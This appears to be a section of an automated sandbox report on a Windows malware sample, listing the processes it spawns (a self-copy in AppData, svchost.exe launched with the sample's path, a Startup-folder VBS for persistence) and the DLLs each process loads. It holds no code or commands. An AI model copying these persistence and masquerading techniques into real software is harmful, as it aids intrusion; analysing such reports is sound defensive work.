              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: tyRPPK48Mk.exeReversingLabs: Detection: 73%
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeFile read: C:\Users\user\Desktop\tyRPPK48Mk.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\tyRPPK48Mk.exe "C:\Users\user\Desktop\tyRPPK48Mk.exe"
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\tyRPPK48Mk.exe"
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\tyRPPK48Mk.exe"
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
              Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
              Source: unknownProcess created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
              Source: unknownProcess created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
              Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
              Source: unknownProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
              Source: unknownProcess created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"
              Source: unknownProcess created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
              Source: unknownProcess created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
              Source: unknownProcess created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
              Source: unknownProcess created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
              Source: unknownProcess created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
              Source: unknownProcess created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
              Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\System32\OpenSSH\ssh-agent.exe
              Source: unknownProcess created: C:\Windows\System32\TieringEngineService.exe C:\Windows\system32\TieringEngineService.exe
              Source: unknownProcess created: C:\Windows\System32\AgentService.exe C:\Windows\system32\AgentService.exe
              Source: unknownProcess created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
              Source: unknownProcess created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\tyRPPK48Mk.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\tyRPPK48Mk.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: drprov.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ntlanman.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: davclnt.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: davhlpr.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: browcli.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
